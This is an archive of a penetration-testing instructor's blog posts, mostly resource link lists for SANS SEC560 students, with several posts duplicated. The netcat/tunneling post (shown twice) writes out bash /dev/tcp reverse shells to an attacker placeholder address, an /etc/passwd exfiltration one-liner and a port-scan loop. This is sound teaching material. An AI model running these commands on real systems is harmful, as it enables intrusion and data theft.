I'm thinking of resurrecting this blog. I've been sitting on it a bit and posting elsewhere, but I think this might be an opportune time to dust it off and add some content.
So, first off, if you are looking for the patches or the slides from 'The Safety Dance: Wardriving the 4.9ghz Public Safety Band, they can be found on Github here: https://github.com/OpenSecurityResearch/public-safety
I think we're going to keep poking at it a bit as there may be a few more interesting things to find there. The nice thing about this line of research is it's something you can pull out each time you go to a new city, you never know what kind of cool networks you may find ;)
Secondly, Defcon was really a blast. I think the best part (other than speaking, which was surreal) was meeting the other speakers and having some really cool conversations about each others research. It's humbling to realize how smart some of these guys are, but the truly amazing part is how they treat you as an equal, which I suppose is even more humbling ;)
The other really awesome part was the discussions we had at the Q&A session after the talk. The guys who came to it truly love wireless, and some were wicked talented as well. To the dude who reversed the app for the RFID cards, can you ping me please? I'm trying to figure out which business card is yours and I'm terrible with names. Also, thanks to the other fellow who clued us in on some really useful 4.9ghz infos.
Anyway, check this space for more blathering shortly. With BH/DC being over and me (finally) being home for a little bit, I'm really feeling re-energized and looking forward to new research, so I'll post as much as possible.
Cheers,
RP
Invoking the Daemon
Sunday, August 5, 2012
Thursday, August 26, 2010
Web application hacking resources
Here's some links I provided to my sec560 students this week for the web application hacking section of the course.
Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.
By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are going to put together an informal group which will meet monthly in the Parsippany NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs, all are welcome!
Cheers,
RP
Web application hacking resources
Vulnerable WebApps:
OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary
GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
MOTH - http://www.bonsai-sec.com/en/research/moth.php
Damn Vulnerable Web App - http://www.dvwa.co.uk/
Gruyere - http://google-gruyere.appspot.com/
Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Hackme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Hackme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
Hackme Shipping -
http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
Hackme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
Videos & webcasts:
Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
OWASP Appsec NYC 2008 -http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
Caught in the web series - http://www.coresecurity.com/content/ondemand-caught
Invasion of the browser snatchers series -http://www.coresecurity.com/content/on-demand-snatchers
Advanced SQL injection -http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection
Websec 101 - http://www.foundstone.com/us/websec101.asp
Hackme Bank & Hackme Travel videos- http://www.foundstone.com/us/resources-videos.asp
Tools
Samurai Web Testing Framework (Live CD which contains most tools needed to perform web assesment) - http://samurai.inguardians.com
Google Hacking Database - http://www.hackersforcharity.org/ghdb/
Burpsuite - http://portswigger.net/suite/
W3AF - http://w3af.sourceforge.net/
Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai
Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi
Wikto - http://www.sensepost.com/labs/tools/pentest/wikto
Sqlmap - http://sqlmap.sourceforge.net/
Methodologies & references
OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack
Cheat Sheets
SQL Injection Cheat Sheet -http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet
SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/
SQL Injection Cheat Sheets sorted by DB -http://pentestmonkey.net/index.php?option=com_content&task=category§ionid=9&id=24&Itemid=1
XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html
Web App Assesment Cheat Sheet -http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf
Books:
Web Application Hackers Handbook - http://portswigger.net/wahh/
SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
The Oracle Hackers Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20
Whitepapers & slides-
Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf
OWASP article on Web application penetration testing -http://www.owasp.org/index.php/Web_Application_Penetration_Testing
Advanced SQL injection -http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
Best of web application penetration testing tools -http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf
(The next two papers are a little old, but still quite useful)
Advanced SQL Injection in SQL Server -http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
(More) Advanced SQL Injection in SQL server -http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.
By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are going to put together an informal group which will meet monthly in the Parsippany NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs, all are welcome!
Cheers,
RP
Web application hacking resources
Vulnerable WebApps:
OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary
GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
MOTH - http://www.bonsai-sec.com/en/research/moth.php
Damn Vulnerable Web App - http://www.dvwa.co.uk/
Gruyere - http://google-gruyere.appspot.com/
Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Hackme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Hackme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
Hackme Shipping -
http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
Hackme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
Videos & webcasts:
Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
OWASP Appsec NYC 2008 -http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
Caught in the web series - http://www.coresecurity.com/content/ondemand-caught
Invasion of the browser snatchers series -http://www.coresecurity.com/content/on-demand-snatchers
Advanced SQL injection -http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection
Websec 101 - http://www.foundstone.com/us/websec101.asp
Hackme Bank & Hackme Travel videos- http://www.foundstone.com/us/resources-videos.asp
Tools
Samurai Web Testing Framework (Live CD which contains most tools needed to perform web assesment) - http://samurai.inguardians.com
Google Hacking Database - http://www.hackersforcharity.org/ghdb/
Burpsuite - http://portswigger.net/suite/
W3AF - http://w3af.sourceforge.net/
Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai
Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi
Wikto - http://www.sensepost.com/labs/tools/pentest/wikto
Sqlmap - http://sqlmap.sourceforge.net/
Methodologies & references
OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack
Cheat Sheets
SQL Injection Cheat Sheet -http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet
SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/
SQL Injection Cheat Sheets sorted by DB -http://pentestmonkey.net/index.php?option=com_content&task=category§ionid=9&id=24&Itemid=1
XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html
Web App Assesment Cheat Sheet -http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf
Books:
Web Application Hackers Handbook - http://portswigger.net/wahh/
SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
The Oracle Hackers Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20
Whitepapers & slides-
Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf
OWASP article on Web application penetration testing -http://www.owasp.org/index.php/Web_Application_Penetration_Testing
Advanced SQL injection -http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
Best of web application penetration testing tools -http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf
(The next two papers are a little old, but still quite useful)
Advanced SQL Injection in SQL Server -http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
(More) Advanced SQL Injection in SQL server -http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
Saturday, August 21, 2010
Password cracking resources
Here's a few links to word lists, rainbow tables & other assorted password cracking related resources I provided to my sec560 mentor class. It seems to me to be a fairly short list so I believe I may be omitting a few things. If you notice something missing, let me know & I'll add it in...
Cheers,
RP
http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPU's.
http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.
http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.
http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.
http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)
http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)
http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)
http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.
Cheers,
RP
http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPU's.
http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.
http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.
http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.
http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)
http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)
http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)
http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.
Friday, August 13, 2010
/dev/tcp contest
So, I gave my SEC560 mentor class a challenge this week, the student who finds the coolest use for /dev/tcp get's a $10 gift certificate to Starbucks (hey, I'm poor, ok?)
Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.
Good luck & remember "If you're not playing the game, the game is playing you"
Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.
Good luck & remember "If you're not playing the game, the game is playing you"
Resources on netcat, /dev/tcp, tunneling, etc.
Here's a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) & as usual the conversation strayed into other ways to redirect & tunnel traffic so you'll find some resources in that regard below.
I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit
Ed Skoudis -Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/coresecurity/PenTestingNinjitsuSeries.html
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/coresecurity/PenTestingPerfectStormSeries.html
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/coresecurity/PerfectStormPart4.html
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/coresecurity/InvasionoftheBrowserSnatchersSeries.html
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.html
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/socat/
Cryptcat: http://cryptcat.sourceforge.net/info.php
DNScat: http://tadek.pietraszek.org/projects/DNScat/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/PingTunnel/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies
Stunnel - http://www.stunnel.org/ -
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
Proxytunnel - http://proxytunnel.sourceforge.net/
Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.sourceforge.net/paper.php
ProxyChains - http://proxychains.sourceforge.net/
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
GnuCitizen User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0 # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit: http://pauldotcom.com/wiki/
Ed Skoudis -Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/
Cryptcat: http://cryptcat.sourceforge.
DNScat: http://tadek.pietraszek.org/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies
Stunnel - http://www.stunnel.org/ -
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
Proxytunnel - http://proxytunnel.
Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.
ProxyChains - http://proxychains.
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.
GnuCitizen User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0 # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
Thursday, July 15, 2010
A few more odds & ends
Still no time for original content, but here a few more resources I sent to my sec560 students, figured I would share them on here as well...
Sec560 week 4 resources:
Here is the free online version of Fyodor's NMAP book, Not all chapters are available, but still a great read - http://nmap.org/book/toc.html
Great tutorial on Scapy:
http://www.secdev.org/projects/scapy/doc/usage.html#interactive-tutorial
Also, a Python tutorial to go with it - http://docs.python.org/tutorial/
Here are two of the papers I mentioned in class:
Exploiting Tomorrow's Internet Today Penetration Testing with IPv6 - http://www.uninformed.org/?v=10&a=3
Insertion, Evasion & Denial of Service, Eluding Network Intrusion Detection - http://insecure.org/stf/secnet_ids/secnet_ids.html
These are some of the blogs I read (or more accurately, try to find time to read)
http://www.darkoperator.com/ - Carlos Perez
http://blog.metasploit.com/ - HD Moore, Egypt & others..
http://taosecurity.blogspot.com/ - Richard Bejtlich
http://www.packetstan.com/ - Judy Novak, Mike Poor, Josh Wright
http://pauldotcom.com/ - Paul Assadorian, Larry Pesce, Carlos Perez, John Strand, Mick Douglas
http://blog.commandlinekungfu.com/ - Ed Skoudis, Hal Pomeranz, Tim Medin
http://carnal0wnage.attackresearch.com/ - Chris Gates, Valsmith & others..
http://vrt-sourcefire.blogspot.com/ - Sourcefire Vulnerability Research Team
http://theharmonyguy.com/ - Joey Tyson
http://blog.harmonysecurity.com/ - Stephen Fewer
http://isc.sans.edu/index.html - SANS Internet Storm Center
Sec560 week 4 resources:
Here is the free online version of Fyodor's NMAP book, Not all chapters are available, but still a great read - http://nmap.org/book/toc.html
Great tutorial on Scapy:
http://www.secdev.org/projects/scapy/doc/usage.html#interactive-tutorial
Also, a Python tutorial to go with it - http://docs.python.org/tutorial/
Here are two of the papers I mentioned in class:
Exploiting Tomorrow's Internet Today Penetration Testing with IPv6 - http://www.uninformed.org/?v=10&a=3
Insertion, Evasion & Denial of Service, Eluding Network Intrusion Detection - http://insecure.org/stf/secnet_ids/secnet_ids.html
These are some of the blogs I read (or more accurately, try to find time to read)
http://www.darkoperator.com/ - Carlos Perez
http://blog.metasploit.com/ - HD Moore, Egypt & others..
http://taosecurity.blogspot.com/ - Richard Bejtlich
http://www.packetstan.com/ - Judy Novak, Mike Poor, Josh Wright
http://pauldotcom.com/ - Paul Assadorian, Larry Pesce, Carlos Perez, John Strand, Mick Douglas
http://blog.commandlinekungfu.com/ - Ed Skoudis, Hal Pomeranz, Tim Medin
http://carnal0wnage.attackresearch.com/ - Chris Gates, Valsmith & others..
http://vrt-sourcefire.blogspot.com/ - Sourcefire Vulnerability Research Team
http://theharmonyguy.com/ - Joey Tyson
http://blog.harmonysecurity.com/ - Stephen Fewer
http://isc.sans.edu/index.html - SANS Internet Storm Center
Tuesday, July 13, 2010
The end of procrastination (maybe)
I've been trying to get around to start posting on here for a while now, but can never quite come up with what I want to post.
So, I figure I'll just start off with some resources I've been sharing with the students of my sec560 mentor class.
Enjoy & I promise some original content soon (maybe) lol
Resources for sec560 week2:
First off a few Penetration Testing methodologies:
OSSTMM (Open Source Security Testing Methodology Manual) - http://www.isecom.org/osstmm/
Penetration Testing Framework - http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html (Super detailed)
OWASP Testing Guide (focused on web application testing) - http://www.owasp.org/index.php/Category:OWASP_Testing_Project
NIST Guide to Security Testing - http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
Also, here is a great reference for computer crime related laws: http://www.cybercrime.gov/cclaws.html
One final item, here are a bunch of infosec related 'cheat sheets', the SANS one's pertaining to this course are at the bottom - http://zeltser.com/cheat-sheets/
Resources for sec560 week 3:
Reconnaissance tools & scripts:
Metagoofil: http://www.edge-security.com/metagoofil.php
Metagoofil is an information gathering tool designed for extracting metadata of
public documents (pdf,doc,xls,ppt,odp,ods) availables in the target/victim websites.
The Harvester: http://www.edge-security.com/theHarvester.php
theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains
from different public sources. It's a really simple tool, but very effective.
Subdomainer: http://www.edge-security.com/subdomainer.php
Subdomainer is an information gathering tool designed for obtaining subdomain names from public sources,
like Google, Msn search, Yahoo, PgP servers, etc.
gpscan: http://www.digininja.org/projects/gpscan.php
Scans google profiles for profiles of personnel from a target organization
CeWL: http://www.digininja.org/projects/cewl.php
Custom wordlist generator, scrapes a site & generates a list of words useful for pasword guessing.
Reconnoiter: http://www.jwnetworkconsulting.com/security/web-application-security/new-open-source-project-created-reconnoiter
Generates possible user names by scraping LinkedIn for the names of employees of the target organization
Recommended talks & presentations:
New School Information Gathering - Chris Gates
Audio: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.mp3
Slides: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.pdf
Tactical Exploitation - HD Moore & Valsmith:
Video (part 1): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V35-Moore-Valsmith-Tactical_Exploitation-PT1.mp4
Video (part 2): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V36-Moore-Valsmith-Tactical_Exploitation-PT2.mp4
Whitepaper v1: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf
Whitepaper v2: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf
So, I figure I'll just start off with some resources I've been sharing with the students of my sec560 mentor class.
Enjoy & I promise some original content soon (maybe) lol
Resources for sec560 week2:
First off a few Penetration Testing methodologies:
OSSTMM (Open Source Security Testing Methodology Manual) - http://www.isecom.org/osstmm/
Penetration Testing Framework - http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html (Super detailed)
OWASP Testing Guide (focused on web application testing) - http://www.owasp.org/index.php/Category:OWASP_Testing_Project
NIST Guide to Security Testing - http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
Also, here is a great reference for computer crime related laws: http://www.cybercrime.gov/cclaws.html
One final item, here are a bunch of infosec related 'cheat sheets', the SANS one's pertaining to this course are at the bottom - http://zeltser.com/cheat-sheets/
Resources for sec560 week 3:
Reconnaissance tools & scripts:
Metagoofil: http://www.edge-security.com/metagoofil.php
Metagoofil is an information gathering tool designed for extracting metadata of
public documents (pdf,doc,xls,ppt,odp,ods) availables in the target/victim websites.
The Harvester: http://www.edge-security.com/theHarvester.php
theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains
from different public sources. It's a really simple tool, but very effective.
Subdomainer: http://www.edge-security.com/subdomainer.php
Subdomainer is an information gathering tool designed for obtaining subdomain names from public sources,
like Google, Msn search, Yahoo, PgP servers, etc.
gpscan: http://www.digininja.org/projects/gpscan.php
Scans google profiles for profiles of personnel from a target organization
CeWL: http://www.digininja.org/projects/cewl.php
Custom wordlist generator, scrapes a site & generates a list of words useful for pasword guessing.
Reconnoiter: http://www.jwnetworkconsulting.com/security/web-application-security/new-open-source-project-created-reconnoiter
Generates possible user names by scraping LinkedIn for the names of employees of the target organization
Recommended talks & presentations:
New School Information Gathering - Chris Gates
Audio: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.mp3
Slides: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.pdf
Tactical Exploitation - HD Moore & Valsmith:
Video (part 1): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V35-Moore-Valsmith-Tactical_Exploitation-PT1.mp4
Video (part 2): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V36-Moore-Valsmith-Tactical_Exploitation-PT2.mp4
Whitepaper v1: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf
Whitepaper v2: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf
Subscribe to:
Posts (Atom)